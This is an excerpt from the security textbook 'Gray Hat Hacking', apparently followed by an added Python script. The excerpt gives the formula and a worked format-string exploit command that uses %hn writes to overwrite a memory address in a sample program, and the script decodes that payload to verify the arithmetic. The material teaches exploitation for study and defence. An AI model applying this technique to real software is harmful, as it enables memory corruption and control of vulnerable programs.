
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

49143x
%[offset]$hn | %[offset+1]$hn | | %4\$hn
%.[LOB - HOB]x | %.[HOB - LOB]x | "." Used to ensure integers. Expressed in decimal. | 0xff50-0xbfff = 16209 in decimal: %.16209x
%[offset+1]$hn | %[offset]$hn | | %5\$hn
Table 8-2 The Magic Formula to Calculate your Exploit Format String
Chapter 8: Advanced Linux Exploits
PART III
To construct the injection buffer to overwrite the canary address 0x08049440 with
0xbfffff50, follow the formula in Table 8-2. Values are calculated for you in the right column
and used here:
$ ./fmtstr `printf "\x42\x94\x04\x08\x40\x94\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000648
Canary at 0x08049440 = 0xbfffff50
CAUTION Once again, your values will be different.
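
The arithmetic in Table 8-2 can be checked by decoding the string above rather than running it. This is an added example, not code from the book: it walks the argument, tracks the printed character count, and reports which 16-bit value each %hn stores. The function names are hypothetical, and it assumes argument 4 is the first 4-byte word of the buffer, as the %4\$hn and %5\$hn entries imply.

```python
import re
import struct

# Only the two directive forms used on the page are modelled:
# "%.<N>x" prints N characters, "%<K>$hn" stores the running count via argument K.
DIRECTIVE = re.compile(rb"%(?:\.(\d+)x|(\d+)\$hn)")

def decode_hn_writes(payload: bytes, first_offset: int) -> dict:
    """Return {address: 16-bit value} for every %K$hn in payload.

    Assumption: argument `first_offset` is the first little-endian 32-bit word
    of the payload itself, and each %.Nx prints exactly N characters.
    """
    head_len = payload.index(b"%")
    if head_len % 4:
        raise ValueError("address block is not a whole number of 32-bit words")
    addrs = struct.unpack(f"<{head_len // 4}I", payload[:head_len])
    count = head_len                    # the raw address bytes are printed first
    writes, pos = {}, head_len
    while pos < len(payload):
        m = DIRECTIVE.match(payload, pos)
        if m is None:
            if payload[pos:pos + 1] == b"%":
                raise ValueError("directive not modelled in this example")
            count += 1                  # any other byte is printed literally
            pos += 1
            continue
        if m.group(1) is not None:
            count += int(m.group(1))    # precision = number of digits printed
        else:
            idx = int(m.group(2)) - first_offset
            if not 0 <= idx < len(addrs):
                raise ValueError("argument index outside the address block")
            writes[addrs[idx]] = count & 0xFFFF   # %hn keeps the low 16 bits
        pos = m.end()
    return writes

def combine_words(writes: dict, base: int) -> int:
    """Join the halfwords at base and base+2 into the 32-bit value stored at base."""
    return (writes[base + 2] << 16) | writes[base]

# The page's argument as the program receives it (after the shell expands printf and \$).
PAGE_PAYLOAD = b"\x42\x94\x04\x08\x40\x94\x04\x08%.49143x%4$hn%.16209x%5$hn"

if __name__ == "__main__":
    w = decode_hn_writes(PAGE_PAYLOAD, first_offset=4)
    for addr, val in sorted(w.items()):
        print(f"0x{addr:08x} <- 0x{val:04x}")
    print(f"value at 0x08049440: 0x{combine_words(w, 0x08049440):08x}")
```

The 8 address bytes plus 49143 padding characters give 49151 (0xbfff) at the first %hn, and a further 16209 gives 65360 (0xff50) at the second, which together match the canary value printed by the program.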

